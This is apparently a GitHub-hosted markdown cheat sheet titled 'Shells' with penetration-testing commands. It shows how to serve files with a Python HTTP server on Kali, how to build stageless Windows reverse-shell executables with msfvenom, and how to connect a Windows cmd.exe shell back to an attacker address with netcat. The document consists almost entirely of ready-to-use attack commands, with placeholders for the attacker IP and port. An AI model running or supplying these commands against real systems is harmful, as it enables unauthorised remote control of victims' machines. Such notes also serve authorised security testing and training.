Skip to content

Latest commit

 

History

History
15 lines (8 loc) · 597 Bytes

File metadata and controls

15 lines (8 loc) · 597 Bytes

Shells

Start HTTP python server on Kali

python3 -m http.server 8080

Windows reverse shell

Stageless Payloads for Windows

x86msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
x64msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Start reverse shell from Windows

c:\temp\nc.exe -e cmd.exe <Attack_IP> <port>